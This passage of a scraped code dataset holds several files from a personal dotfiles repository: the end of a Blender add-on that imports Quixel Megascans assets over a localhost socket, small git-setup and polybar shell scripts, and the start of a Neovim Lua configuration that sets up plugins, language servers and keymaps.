We compose a name with the ID otherwise.\n if \"name\" in self.json_data.keys():\n self.assetName = self.json_data[\"name\"].replace(\" \", \"_\")\n else:\n self.assetName = os.path.basename(self.json_data[\"path\"]).replace(\" \", \"_\")\n if len(self.assetName.split(\"_\")) > 2:\n self.assetName = \"_\".join(self.assetName.split(\"_\")[:-1])\n\n self.materialName = self.assetName + '_' + self.assetID\n self.colorSpaces = [\"sRGB\", \"Non-Color\", \"Linear\"]\n\n # Initialize the import method to start building our shader and import our geometry\n self.initImportProcess()\n print(\"Imported asset from \" + self.assetName + \" Quixel Bridge\")\n \n if len(globals()['MG_AlembicPath']) > 0:\n globals()['MG_ImportComplete'] = True \n except Exception as e:\n print( \"Megascans Plugin Error initializing the import process. Error: \", str(e) )\n \n globals()['Megascans_DataSet'] = None\n \n # this method is used to import the geometry and create the material setup.\n def initImportProcess(self):\n try:\n if len(self.textureList) >= 1:\n \n if(self.ApplyToSelection and self.assetType not in [\"3dplant\", \"3d\"]):\n self.CollectSelectedObjects()\n\n self.ImportGeometry()\n self.CreateMaterial()\n self.ApplyMaterialToGeometry()\n if(self.isScatterAsset and len(self.selectedObjects) > 1):\n self.ScatterAssetSetup()\n elif (self.assetType == \"3dplant\" and len(self.selectedObjects) > 1):\n self.PlantAssetSetup()\n\n self.SetupMaterial()\n\n if self.isAlembic:\n globals()['MG_Material'].append(self.mat)\n\n except Exception as e:\n print( \"Megascans Plugin Error while importing textures/geometry or setting up material. Error: \", str(e) )\n\n def ImportGeometry(self):\n try:\n # Import geometry\n abcPaths = []\n if len(self.geometryList) >= 1:\n for obj in self.geometryList:\n meshPath = obj[1]\n meshFormat = obj[0]\n\n if meshFormat.lower() == \"fbx\":\n bpy.ops.import_scene.fbx(filepath=meshPath)\n # get selected objects\n obj_objects = [ o for o in bpy.context.scene.objects if o.select_get() ]\n self.selectedObjects += obj_objects\n\n elif meshFormat.lower() == \"obj\":\n bpy.ops.import_scene.obj(filepath=meshPath, use_split_objects = True, use_split_groups = True, global_clight_size = 1.0)\n # get selected objects\n obj_objects = [ o for o in bpy.context.scene.objects if o.select_get() ]\n self.selectedObjects += obj_objects\n\n elif meshFormat.lower() == \"abc\":\n self.isAlembic = True\n abcPaths.append(meshPath)\n \n if self.isAlembic:\n globals()['MG_AlembicPath'].append(abcPaths)\n except Exception as e:\n print( \"Megascans Plugin Error while importing textures/geometry or setting up material. 
Error: \", str(e) )\n\n def dump(self, obj):\n for attr in dir(obj):\n print(\"obj.%s = %r\" % (attr, getattr(obj, attr)))\n\n def CollectSelectedObjects(self):\n try:\n sceneSelectedObjects = [ o for o in bpy.context.scene.objects if o.select_get() ]\n for obj in sceneSelectedObjects:\n if obj.type == \"MESH\":\n self.selectedObjects.append(obj)\n except Exception as e:\n print(\"Megascans Plugin Error::CollectSelectedObjects::\", str(e) )\n\n def ApplyMaterialToGeometry(self):\n for obj in self.selectedObjects:\n # assign material to obj\n obj.active_material = self.mat\n\n def CheckScatterAsset(self):\n if('scatter' in self.json_data['categories'] or 'scatter' in self.json_data['tags'] or 'cmb_asset' in self.json_data['categories'] or 'cmb_asset' in self.json_data['tags']):\n return True\n return False\n\n def CheckIsBillboard(self):\n # Use billboard textures if importing the Billboard LOD.\n if(self.assetType == \"3dplant\"):\n if (self.activeLOD == self.minLOD):\n return True\n return False\n\n #Add empty parent for the scatter assets.\n def ScatterAssetSetup(self):\n bpy.ops.object.empty_add(type='ARROWS')\n emptyRefList = [ o for o in bpy.context.scene.objects if o.select_get() and o not in self.selectedObjects ]\n for scatterParentObject in emptyRefList:\n scatterParentObject.name = self.assetID + \"_\" + self.assetName\n for obj in self.selectedObjects:\n obj.parent = scatterParentObject\n break\n \n #Add empty parent for plants.\n def PlantAssetSetup(self):\n bpy.ops.object.empty_add(type='ARROWS')\n emptyRefList = [ o for o in bpy.context.scene.objects if o.select_get() and o not in self.selectedObjects ]\n for plantParentObject in emptyRefList:\n plantParentObject.name = self.assetID + \"_\" + self.assetName\n for obj in self.selectedObjects:\n obj.parent = plantParentObject\n break\n\n # def AddModifiersToGeomtry(self, geo_list, mat):\n # for obj in geo_list:\n # # assign material to obj\n # bpy.ops.object.modifier_add(type='SOLIDIFY')\n\n #Shader setups for all asset types. 
Some type specific functionality is also handled here.\n def SetupMaterial (self):\n if \"albedo\" in self.textureTypes:\n if \"ao\" in self.textureTypes:\n self.CreateTextureMultiplyNode(\"albedo\", \"ao\", -250, 320, -640, 460, -640, 200, 0, 1, True, 0)\n else:\n self.CreateTextureNode(\"albedo\", -640, 420, 0, True, 0)\n \n if self.isSpecularWorkflow:\n if \"specular\" in self.textureTypes:\n self.CreateTextureNode(\"specular\", -1150, 200, 0, True, 5)\n \n if \"gloss\" in self.textureTypes:\n glossNode = self.CreateTextureNode(\"gloss\", -1150, -60)\n invertNode = self.CreateGenericNode(\"ShaderNodeInvert\", -250, 60)\n # Add glossNode to invertNode connection\n self.mat.node_tree.links.new(invertNode.inputs[1], glossNode.outputs[0])\n # Connect roughness node to the material parent node.\n self.mat.node_tree.links.new(self.nodes.get(self.parentName).inputs[7], invertNode.outputs[0])\n elif \"roughness\" in self.textureTypes:\n self.CreateTextureNode(\"roughness\", -1150, -60, 1, True, 7)\n else:\n if \"metalness\" in self.textureTypes:\n self.CreateTextureNode(\"metalness\", -1150, 200, 1, True, 4)\n \n if \"roughness\" in self.textureTypes:\n self.CreateTextureNode(\"roughness\", -1150, -60, 1, True, 7)\n elif \"gloss\" in self.textureTypes:\n glossNode = self.CreateTextureNode(\"gloss\", -1150, -60)\n invertNode = self.CreateGenericNode(\"ShaderNodeInvert\", -250, 60)\n # Add glossNode to invertNode connection\n self.mat.node_tree.links.new(invertNode.inputs[1], glossNode.outputs[0])\n # Connect roughness node to the material parent node.\n self.mat.node_tree.links.new(self.nodes.get(self.parentName).inputs[7], invertNode.outputs[0])\n \n if \"opacity\" in self.textureTypes:\n self.CreateTextureNode(\"opacity\", -1550, -160, 1, True, 18)\n self.mat.blend_method = 'HASHED'\n\n if \"translucency\" in self.textureTypes:\n self.CreateTextureNode(\"translucency\", -1550, -420, 0, True, 15)\n elif \"transmission\" in self.textureTypes:\n self.CreateTextureNode(\"transmission\", -1550, -420, 1, True, 15)\n\n # If HIGH POLY selected > use normal_bump and no displacement\n # If LODs selected > use corresponding LODs normal + displacement\n if self.isHighPoly:\n self.BumpSetup = False\n self.CreateNormalNodeSetup(True, 19)\n\n if \"displacement\" in self.textureTypes and not self.isHighPoly:\n self.CreateDisplacementSetup(True)\n\n def CreateMaterial(self):\n self.mat = (bpy.data.materials.get( self.materialName ) or bpy.data.materials.new( self.materialName ))\n self.mat.use_nodes = True\n self.nodes = self.mat.node_tree.nodes\n self.parentName = \"Principled BSDF\"\n self.materialOutputName = \"Material Output\"\n\n self.mat.node_tree.nodes[self.parentName].distribution = 'MULTI_GGX'\n self.mat.node_tree.nodes[self.parentName].inputs[4].default_value = 1 if self.isMetal else 0 # Metallic value\n self.mat.node_tree.nodes[self.parentName].inputs[14].default_value = self.IOR\n \n self.mappingNode = None\n\n if self.isCycles and self.assetType not in [\"3d\", \"3dplant\"]:\n # Create mapping node.\n self.mappingNode = self.CreateGenericNode(\"ShaderNodeMapping\", -1950, 0)\n self.mappingNode.vector_type = 'TEXTURE'\n # Create texture coordinate node.\n texCoordNode = self.CreateGenericNode(\"ShaderNodeTexCoord\", -2150, -200)\n # Connect texCoordNode to the mappingNode\n self.mat.node_tree.links.new(self.mappingNode.inputs[0], texCoordNode.outputs[0])\n\n def CreateTextureNode(self, textureType, PosX, PosY, colorspace = 1, connectToMaterial = False, materialInputIndex = 0):\n texturePath = 
self.GetTexturePath(textureType)\n textureNode = self.CreateGenericNode('ShaderNodeTexImage', PosX, PosY)\n textureNode.image = bpy.data.images.load(texturePath)\n textureNode.show_texture = True\n textureNode.image.colorspace_settings.name = self.colorSpaces[colorspace] # \"sRGB\", \"Non-Color\", \"Linear\"\n \n if textureType in [\"albedo\", \"specular\", \"translucency\"]:\n if self.GetTextureFormat(textureType) in \"exr\":\n textureNode.image.colorspace_settings.name = self.colorSpaces[2] # \"sRGB\", \"Non-Color\", \"Linear\"\n\n if connectToMaterial:\n self.ConnectNodeToMaterial(materialInputIndex, textureNode)\n # If it is Cycles render we connect it to the mapping node.\n if self.isCycles and self.assetType not in [\"3d\", \"3dplant\"]:\n self.mat.node_tree.links.new(textureNode.inputs[0], self.mappingNode.outputs[0])\n return textureNode\n\n def CreateTextureMultiplyNode(self, aTextureType, bTextureType, PosX, PosY, aPosX, aPosY, bPosX, bPosY, aColorspace, bColorspace, connectToMaterial, materialInputIndex):\n #Add Color>MixRGB node, transform it in the node editor, change it's operation to Multiply and finally we colapse the node.\n multiplyNode = self.CreateGenericNode('ShaderNodeMixRGB', PosX, PosY)\n multiplyNode.blend_type = 'MULTIPLY'\n #Setup A and B nodes\n textureNodeA = self.CreateTextureNode(aTextureType, aPosX, aPosY, aColorspace)\n textureNodeB = self.CreateTextureNode(bTextureType, bPosX, bPosY, bColorspace)\n # Conned albedo and ao node to the multiply node.\n self.mat.node_tree.links.new(multiplyNode.inputs[1], textureNodeA.outputs[0])\n self.mat.node_tree.links.new(multiplyNode.inputs[2], textureNodeB.outputs[0])\n\n if connectToMaterial:\n self.ConnectNodeToMaterial(materialInputIndex, multiplyNode)\n\n return multiplyNode\n\n def CreateNormalNodeSetup(self, connectToMaterial, materialInputIndex):\n \n bumpNode = None\n normalNode = None\n bumpMapNode = None\n normalMapNode = None\n\n if self.NormalSetup and self.BumpSetup:\n bumpMapNode = self.CreateTextureNode(\"bump\", -640, -130)\n normalMapNode = self.CreateTextureNode(\"normal\", -1150, -580)\n bumpNode = self.CreateGenericNode(\"ShaderNodeBump\", -250, -170)\n bumpNode.inputs[0].default_value = 0.1\n normalNode = self.CreateGenericNode(\"ShaderNodeNormalMap\", -640, -400)\n # Add normalMapNode to normalNode connection\n self.mat.node_tree.links.new(normalNode.inputs[1], normalMapNode.outputs[0])\n # Add bumpMapNode and normalNode connection to the bumpNode\n self.mat.node_tree.links.new(bumpNode.inputs[2], bumpMapNode.outputs[0])\n if (2, 81, 0) > bpy.app.version:\n self.mat.node_tree.links.new(bumpNode.inputs[3], normalNode.outputs[0])\n else:\n self.mat.node_tree.links.new(bumpNode.inputs[5], normalNode.outputs[0])\n # Add bumpNode connection to the material parent node\n if connectToMaterial:\n self.ConnectNodeToMaterial(materialInputIndex, bumpNode)\n elif self.NormalSetup:\n normalMapNode = self.CreateTextureNode(\"normal\", -640, -207)\n normalNode = self.CreateGenericNode(\"ShaderNodeNormalMap\", -250, -170)\n # Add normalMapNode to normalNode connection\n self.mat.node_tree.links.new(normalNode.inputs[1], normalMapNode.outputs[0])\n # Add normalNode connection to the material parent node\n if connectToMaterial:\n self.ConnectNodeToMaterial(materialInputIndex, normalNode)\n elif self.BumpSetup:\n bumpMapNode = self.CreateTextureNode(\"bump\", -640, -207)\n bumpNode = self.CreateGenericNode(\"ShaderNodeBump\", -250, -170)\n bumpNode.inputs[0].default_value = 0.1\n # Add bumpMapNode and normalNode 
connection to the bumpNode\n self.mat.node_tree.links.new(bumpNode.inputs[2], bumpMapNode.outputs[0])\n # Add bumpNode connection to the material parent node\n if connectToMaterial:\n self.ConnectNodeToMaterial(materialInputIndex, bumpNode)\n\n def CreateDisplacementSetup(self, connectToMaterial):\n if self.DisplacementSetup == \"adaptive\":\n # Add vector>displacement map node\n displacementNode = self.CreateGenericNode(\"ShaderNodeDisplacement\", 10, -400)\n displacementNode.inputs[2].default_value = 0.1\n displacementNode.inputs[1].default_value = 0\n # Add converter>RGB Separator node\n RGBSplitterNode = self.CreateGenericNode(\"ShaderNodeSeparateRGB\", -250, -499)\n # Import normal map and normal map node setup.\n displacementMapNode = self.CreateTextureNode(\"displacement\", -640, -740)\n # Add displacementMapNode to RGBSplitterNode connection\n self.mat.node_tree.links.new(RGBSplitterNode.inputs[0], displacementMapNode.outputs[0])\n # Add RGBSplitterNode to displacementNode connection\n self.mat.node_tree.links.new(displacementNode.inputs[0], RGBSplitterNode.outputs[0])\n # Add normalNode connection to the material output displacement node\n if connectToMaterial:\n self.mat.node_tree.links.new(self.nodes.get(self.materialOutputName).inputs[2], displacementNode.outputs[0])\n self.mat.cycles.displacement_method = 'BOTH'\n\n if self.DisplacementSetup == \"regular\":\n pass \n\n def ConnectNodeToMaterial(self, materialInputIndex, textureNode):\n self.mat.node_tree.links.new(self.nodes.get(self.parentName).inputs[materialInputIndex], textureNode.outputs[0])\n\n def CreateGenericNode(self, nodeName, PosX, PosY):\n genericNode = self.nodes.new(nodeName)\n genericNode.location = (PosX, PosY)\n return genericNode\n\n def GetTexturePath(self, textureType):\n for item in self.textureList:\n if item[1] == textureType:\n return item[2].replace(\"\\\\\", \"/\")\n\n def GetTextureFormat(self, textureType):\n for item in self.textureList:\n if item[1] == textureType:\n return item[0].lower()\n\nclass ms_Init(threading.Thread):\n \n\t#Initialize the thread and assign the method (i.e. importer) to be called when it receives JSON data.\n def __init__(self, importer):\n threading.Thread.__init__(self)\n self.importer = importer\n\n\t#Start the thread to start listing to the port.\n def run(self):\n try:\n run_livelink = True\n host, port = 'localhost', 28888\n #Making a socket object.\n socket_ = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n #Binding the socket to host and port number mentioned at the start.\n socket_.bind((host, port))\n\n #Run until the thread starts receiving data.\n while run_livelink:\n socket_.listen(5)\n #Accept connection request.\n client, addr = socket_.accept()\n data = \"\"\n buffer_size = 4096*2\n #Receive data from the client. 
\n data = client.recv(buffer_size)\n if data == b'Bye Megascans':\n run_livelink = False\n break\n\n #If any data is received over the port.\n if data != \"\":\n self.TotalData = b\"\"\n self.TotalData += data #Append the previously received data to the Total Data.\n #Keep running until the connection is open and we are receiving data.\n while run_livelink:\n #Keep receiving data from client.\n data = client.recv(4096*2)\n if data == b'Bye Megascans':\n run_livelink = False\n break\n #if we are getting data keep appending it to the Total data.\n if data : self.TotalData += data\n else:\n #Once the data transmission is over call the importer method and send the collected TotalData.\n self.importer(self.TotalData)\n break\n except Exception as e:\n print( \"Megascans Plugin Error initializing the thread. Error: \", str(e) )\n\nclass thread_checker(threading.Thread):\n \n\t#Initialize the thread and assign the method (i.e. importer) to be called when it receives JSON data.\n def __init__(self):\n threading.Thread.__init__(self)\n\n\t#Start the thread to start listing to the port.\n def run(self):\n try:\n run_checker = True\n while run_checker:\n time.sleep(3)\n for i in threading.enumerate():\n if(i.getName() == \"MainThread\" and i.is_alive() == False):\n host, port = 'localhost', 28888\n s = socket.socket()\n s.connect((host,port))\n data = \"Bye Megascans\"\n s.send(data.encode())\n s.close()\n run_checker = False\n break\n except Exception as e:\n print( \"Megascans Plugin Error initializing thread checker. Error: \", str(e) )\n pass\n\nclass MS_Init_LiveLink(bpy.types.Operator):\n\n bl_idname = \"bridge.plugin\"\n bl_label = \"Megascans Plugin\"\n socketCount = 0\n\n def execute(self, context):\n\n try:\n globals()['Megascans_DataSet'] = None\n self.thread_ = threading.Thread(target = self.socketMonitor)\n self.thread_.start()\n bpy.app.timers.register(self.newDataMonitor)\n return {'FINISHED'}\n except Exception as e:\n print( \"Megascans Plugin Error starting blender plugin. Error: \", str(e) )\n return {\"FAILED\"}\n\n def newDataMonitor(self):\n try:\n if globals()['Megascans_DataSet'] != None:\n MS_Init_ImportProcess()\n globals()['Megascans_DataSet'] = None \n except Exception as e:\n print( \"Megascans Plugin Error starting blender plugin (newDataMonitor). Error: \", str(e) )\n return {\"FAILED\"}\n return 1.0\n\n\n def socketMonitor(self):\n try:\n #Making a thread object\n threadedServer = ms_Init(self.importer)\n #Start the newly created thread.\n threadedServer.start()\n #Making a thread object\n thread_checker_ = thread_checker()\n #Start the newly created thread.\n thread_checker_.start()\n except Exception as e:\n print( \"Megascans Plugin Error starting blender plugin (socketMonitor). Error: \", str(e) )\n return {\"FAILED\"}\n\n def importer (self, recv_data):\n try:\n globals()['Megascans_DataSet'] = recv_data\n except Exception as e:\n print( \"Megascans Plugin Error starting blender plugin (importer). 
Error: \", str(e) )\n return {\"FAILED\"}\n\nclass MS_Init_Abc(bpy.types.Operator):\n\n bl_idname = \"ms_livelink_abc.py\"\n bl_label = \"Import ABC\"\n\n def execute(self, context):\n\n try:\n if globals()['MG_ImportComplete']:\n \n assetMeshPaths = globals()['MG_AlembicPath']\n assetMaterials = globals()['MG_Material']\n \n if len(assetMeshPaths) > 0 and len(assetMaterials) > 0:\n\n materialIndex = 0\n old_materials = []\n for meshPaths in assetMeshPaths:\n for meshPath in meshPaths:\n bpy.ops.wm.alembic_import(filepath=meshPath, as_background_job=False)\n for o in bpy.context.scene.objects:\n if o.select_get():\n old_materials.append(o.active_material)\n o.active_material = assetMaterials[materialIndex]\n \n \n materialIndex += 1\n \n for mat in old_materials:\n try:\n if mat is not None:\n bpy.data.materials.remove(mat)\n except:\n pass\n\n globals()['MG_AlembicPath'] = []\n globals()['MG_Material'] = []\n globals()['MG_ImportComplete'] = False\n\n return {'FINISHED'}\n except Exception as e:\n print( \"Megascans Plugin Error starting MS_Init_Abc. Error: \", str(e) )\n return {\"CANCELLED\"}\n\n@persistent\ndef load_plugin(scene):\n try:\n bpy.ops.bridge.plugin()\n except Exception as e:\n print( \"Bridge Plugin Error::Could not start the plugin. Description: \", str(e) )\n\ndef menu_func_import(self, context):\n self.layout.operator(MS_Init_Abc.bl_idname, text=\"Megascans: Import Alembic Files\")\n\ndef register():\n if len(bpy.app.handlers.load_post) > 0:\n # Check if trying to register twice.\n if \"load_plugin\" in bpy.app.handlers.load_post[0].__name__.lower() or load_plugin in bpy.app.handlers.load_post:\n return\n bpy.utils.register_class(MS_Init_LiveLink)\n bpy.utils.register_class(MS_Init_Abc)\n bpy.app.handlers.load_post.append(load_plugin)\n bpy.types.TOPBAR_MT_file_import.append(menu_func_import)\n\ndef unregister():\n bpy.types.TOPBAR_MT_file_import.remove(menu_func_import)\n if len(bpy.app.handlers.load_post) > 0:\n # Check if trying to register twice.\n if \"load_plugin\" in bpy.app.handlers.load_post[0].__name__.lower() or load_plugin in bpy.app.handlers.load_post:\n bpy.app.handlers.load_post.remove(load_plugin)\n" }, { "alpha_fraction": 0.6333333253860474, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 38.66666793823242, "blob_id": "e86c8e664a021a2ea874419f61f80278d094707a", "content_id": "bb2defafe9b288fc05a5c0b9378ba1147b0a432f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 120, "license_type": "no_license", "max_line_length": 40, "num_lines": 3, "path": "/gitconfig.sh", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "git config --global user.email \"[email protected]\"\ngit config --global user.name \"Maik Klein\"\nssh-keygen -t rsa -b 4096 -C \"[email protected]\"\n\n" }, { "alpha_fraction": 0.5494505763053894, "alphanum_fraction": 0.5604395866394043, "avg_line_length": 29.33333396911621, "blob_id": "b671434077267896d8bcfe85f622446b4e147932", "content_id": "165912574f4d698d46f52ee8258aa4885ffdd3d4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 91, "license_type": "no_license", "max_line_length": 47, "num_lines": 3, "path": "/penrose/config/polybar/layout_from_penrose_log.sh", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "#!/usr/bin/env sh\ntail -F ~/.penrose.log |\n awk '/\\[INFO\\] ACTIVE_LAYOUT/ { print $4 }'\n" }, { "alpha_fraction": 0.44211718440055847, "alphanum_fraction": 
0.4445028603076935, "avg_line_length": 34.8420295715332, "blob_id": "e4c430e0c9f9230e68b7a45a347b136e6d42a974", "content_id": "301e1a56885eef2dd53c90c573d51826a1788ac4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Lua", "length_bytes": 24731, "license_type": "no_license", "max_line_length": 142, "num_lines": 690, "path": "/nvim/init.lua", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "local lazypath = vim.fn.stdpath(\"data\") .. \"/lazy/lazy.nvim\"\nif not vim.loop.fs_stat(lazypath) then\n vim.fn.system({\n \"git\",\n \"clone\",\n \"--filter=blob:none\",\n \"--single-branch\",\n \"https://github.com/folke/lazy.nvim.git\",\n lazypath,\n })\nend\nvim.opt.runtimepath:prepend(lazypath)\n\nlocal vim = vim\nlocal g = vim.g\nlocal cmd = vim.cmd\n\nvim.o.ruler = false\nvim.o.hidden = true\nvim.o.ignorecase = true\nvim.o.splitbelow = true\nvim.o.splitright = true\nvim.o.termguicolors = true\nvim.o.cul = true\nvim.o.mouse = \"a\"\nvim.o.signcolumn = \"no\"\nvim.o.cmdheight = 1\nvim.o.updatetime = 250 -- update interval for gitsigns\nvim.o.timeoutlen = 400\nvim.o.completeopt = 'menu,menuone,noselect'\nvim.o.expandtab = true\nvim.o.smartindent = true\nvim.opt.whichwrap:append(\"<>hl\")\nvim.o.pumheight = 20\nvim.o.foldmethod = \"manual\"\nvim.o.list = true\nvim.o.smartindent = true\nvim.o.expandtab = true\nvim.o.syntax = \"on\"\nvim.o.shiftwidth = 4\nvim.o.tabstop = 4\nvim.o.virtualedit = \"\"\nvim.o.number = true\nvim.o.relativenumber = true\nvim.o.sessionoptions = \"curdir,winpos,winsize,tabpages,globals\"\nvim.o.tm = 2000\nvim.o.smarttab = true\nvim.o.background = \"dark\"\nvim.o.breakindent = true\n\ng.mapleader = \" \"\ng.auto_save = 0\ng.backspace = \"eol,start,indent\"\ng.whichwrap = \"<,>,h,l\"\n\nlocal mycolorscheme = 'tokyonight'\n\ncmd(\"set noswapfile\")\n\nfor i = 1, 9 do\n vim.keymap.set(\"n\", \"<leader>o\" .. i, i .. \"gt\", { desc = 'Go to Tab ' .. i })\n vim.keymap.set(\"n\", \"<leader>om\" .. i, \":tabm\" .. i .. \"<CR>\", {})\n vim.keymap.set(\"n\", \"<leader>\" .. i, \":\" .. i .. 
\"wincmd w<CR>\", {})\nend\n\nvim.keymap.set(\"n\", \"<leader>od\", \":tabclose<CR>\", {})\nvim.keymap.set(\"n\", \"<leader>oc\", \":tabnew<CR>:tabmove<CR>\", {})\n\nvim.keymap.set(\"n\", \"<leader>sc\", \":noh<CR>\", {})\nvim.keymap.set(\"i\", \"<C-s>\", \"<esc>:w<CR>\", {})\nvim.keymap.set(\"n\", \"<C-s>\", \":w<CR>\", {})\n\nvim.keymap.set(\"n\", \"D\", \"<C-d>\", {})\nvim.keymap.set(\"n\", \"U\", \"<C-u>\", {})\n\nvim.keymap.set(\"n\", \"{\", \"[{\", {})\nvim.keymap.set(\"n\", \"}\", \"]}\", {})\n\nvim.keymap.set(\"n\", \"(\", \"[(\", {})\nvim.keymap.set(\"n\", \")\", \"])\", {})\n\nvim.keymap.set(\"n\", \"<leader>y\", '\"+y', {})\nvim.keymap.set(\"v\", \"<leader>y\", '\"+y', {})\n\nvim.keymap.set('n', '<leader>vr', ':source $MYVIMRC<CR>', {})\nvim.keymap.set('n', '<leader>vq', ':wqa!<CR>', {})\nvim.keymap.set('n', '<leader>voc', ':e $MYVIMRC<CR>', {})\n\nvim.keymap.set(\"v\", \"<C-DOWN>\", \":m '>+1<CR>gv=gv\")\nvim.keymap.set(\"v\", \"<C-UP>\", \":m '<-2<CR>gv=gv\")\n\nvim.keymap.set(\"n\", \"J\", \"mzJ`z\")\nvim.keymap.set(\"n\", \"<C-d>\", \"<C-d>zz\")\nvim.keymap.set(\"n\", \"<C-u>\", \"<C-u>zz\")\nvim.keymap.set(\"n\", \"n\", \"nzzzv\")\nvim.keymap.set(\"n\", \"N\", \"Nzzzv\")\n\nvim.keymap.set({ \"i\", \"c\" }, \"<C-v>\", '<c-r>+')\n\nvim.keymap.set(\"n\", \"<C-o>\", \"<C-o>zz\")\n\nrequire(\"lazy\").setup({\n \"folke/tokyonight.nvim\",\n 'nyoom-engineering/oxocarbon.nvim',\n {\n \"folke/which-key.nvim\",\n config = function()\n require(\"which-key\").setup {\n -- your configuration comes here\n -- or leave it empty to use the default settings\n -- refer to the configuration section below\n }\n end\n },\n\n -- { \"folke/neoconf.nvim\", cmd = \"Neoconf\" },\n { \"folke/neodev.nvim\",\n },\n\n {\n 'neovim/nvim-lspconfig',\n dependencies = {\n -- Automatically install LSPs to stdpath for neovim\n 'williamboman/mason.nvim',\n 'williamboman/mason-lspconfig.nvim',\n\n -- Useful status updates for LSP\n 'j-hui/fidget.nvim',\n\n -- Additional lua configuration, makes nvim stuff amazing\n 'folke/neodev.nvim',\n\n 'nvim-telescope/telescope.nvim',\n 'SmiteshP/nvim-navic',\n 'lvimuser/lsp-inlayhints.nvim'\n },\n config = function()\n -- LSP settings.\n -- This function gets run when an LSP connects to a particular buffer.\n local on_attach = function(client, bufnr)\n -- NOTE: Remember that lua is a real programming language, and as such it is possible\n -- to define small helper and utility functions so you don't have to repeat yourself\n -- many times.\n --\n -- In this case, we create a function that lets us more easily define mappings specific\n -- for LSP related items. It sets the mode, buffer and description for us each time.\n local nmap = function(keys, func, desc)\n if desc then\n desc = 'LSP: ' .. 
desc\n end\n vim.keymap.set({ 'n', 'v' }, keys, func, { buffer = bufnr, desc = desc })\n end\n require(\"lsp-inlayhints\").setup()\n require(\"lsp-inlayhints\").on_attach(client, bufnr, false)\n\n local navic = require('nvim-navic')\n navic.setup({})\n navic.attach(client, bufnr)\n\n local ts = require('telescope.builtin')\n\n nmap('<leader>rn', vim.lsp.buf.rename, '[R]e[n]ame')\n nmap('<leader>lc', vim.lsp.buf.code_action, 'Lsp code action')\n nmap('gd',\n function()\n vim.lsp.buf.definition()\n vim.api.nvim_input('zz')\n end, '[G]oto [D]efinition')\n nmap('gr', ts.lsp_references, '[G]oto [R]eferences')\n nmap('gI', vim.lsp.buf.implementation, '[G]oto [I]mplementation')\n nmap('<leader>D', vim.lsp.buf.type_definition, 'Type [D]efinition')\n nmap('<leader>ld', ts.lsp_document_symbols, '[D]ocument [S]ymbols')\n nmap('<leader>li', ts.lsp_implementations, '[G]oto [I]mplementation')\n nmap('<leader>lk', function()\n vim.diagnostic.open_float({\n source = true,\n })\n end, '[G]oto [I]mplementation')\n nmap('gi', ts.lsp_implementations, '[G]oto [I]mplementation')\n nmap('<leader>ls', ts.lsp_dynamic_workspace_symbols, '[W]orkspace [S]ymbols')\n nmap('<leader>ls',\n function()\n local sorters = require \"telescope.sorters\"\n ts.lsp_dynamic_workspace_symbols({\n sorter = sorters.get_generic_fuzzy_sorter()\n })\n end,\n 'lsp')\n nmap('<leader>lf',\n function()\n ts.lsp_dynamic_workspace_symbols({\n symbols = {\n 'function',\n 'method',\n }\n })\n end,\n 'LSP Fuctions')\n nmap('<leader>lt',\n function()\n ts.lsp_dynamic_workspace_symbols({\n symbols = {\n 'struct',\n 'typeparameter',\n 'interace',\n 'enum',\n 'struct',\n 'class',\n }\n })\n end,\n 'LSP Types')\n nmap('K', vim.lsp.buf.hover, 'Hover Documentation')\n nmap('<C-k>', vim.lsp.buf.signature_help, 'Signature Documentation')\n -- Lesser used LSP functionality\n nmap('gD', vim.lsp.buf.declaration, '[G]oto [D]eclaration')\n\n nmap('<leader>ff', vim.lsp.buf.format, '[F]ormat')\n\n -- Create a command `:Format` local to the LSP buffer\n vim.api.nvim_buf_create_user_command(bufnr, 'Format', function(_)\n vim.lsp.buf.format()\n end, { desc = 'Format current buffer with LSP' })\n end\n -- Enable the following language servers\n -- Feel free to add/remove any LSPs that you want here. They will automatically be installed.\n --\n -- Add any additional override configuration in the following tables. They will be passed to\n -- the `settings` field of the server config. 
You must look up that documentation yourself.\n local servers = {\n -- clangd = {},\n -- gopls = {},\n -- pyright = {},\n -- rust_analyzer = {},\n -- tsserver = {},\n rust_analyzer = {\n ['rust-analyzer'] = {\n diagnostics = {\n enable = false,\n },\n checkOnSave = {\n command = \"clippy\",\n },\n workspace = {\n symbol = {\n search = {\n kind = \"all_symbols\"\n }\n }\n },\n procMacro = {\n enable = true\n }\n }\n },\n sumneko_lua = {\n Lua = {\n workspace = { checkThirdParty = false },\n telemetry = { enable = false },\n },\n },\n }\n -- Setup neovim lua configuration\n require('neodev').setup()\n --\n -- nvim-cmp supports additional completion capabilities, so broadcast that to servers\n local capabilities = vim.lsp.protocol.make_client_capabilities()\n capabilities = require('cmp_nvim_lsp').default_capabilities(capabilities)\n capabilities.textDocument.completion.completionItem.resolveSupport = {\n properties = {\n \"additionalTextEdits\",\n },\n }\n -- Setup mason so it can manage external tooling\n require('mason').setup()\n -- Ensure the servers above are installed\n local mason_lspconfig = require 'mason-lspconfig'\n mason_lspconfig.setup {\n ensure_installed = vim.tbl_keys(servers),\n }\n\n mason_lspconfig.setup_handlers {\n function(server_name)\n require('lspconfig')[server_name].setup {\n capabilities = capabilities,\n on_attach = on_attach,\n settings = servers[server_name],\n }\n end,\n }\n\n require('fidget').setup()\n end\n },\n {\n 'onsails/lspkind.nvim',\n config = function()\n require('lspkind').init()\n end\n },\n\n {\n 'L3MON4D3/LuaSnip',\n version = \"v1.*\",\n -- install jsregexp (optional!).\n -- build = \"make install_jsregexp\"\n },\n\n {\n -- Autocompletion\n 'hrsh7th/nvim-cmp',\n dependencies = { 'hrsh7th/cmp-nvim-lsp', 'L3MON4D3/LuaSnip', 'saadparwaiz1/cmp_luasnip', 'onsails/lspkind.nvim',\n 'hrsh7th/cmp-nvim-lsp-signature-help' },\n config = function()\n -- nvim-cmp setup\n local cmp = require 'cmp'\n local luasnip = require 'luasnip'\n -- luasnip.setup({\n -- history = true\n -- })\n -- luasnip.config.setup {}\n\n local function maybe_load_vscode_snippets()\n local Path = require(\"luasnip.util.path\")\n local cur_dir = vim.fn.getcwd()\n local vscode_dir = Path.join(cur_dir, \".vscode\")\n local package_json_file = 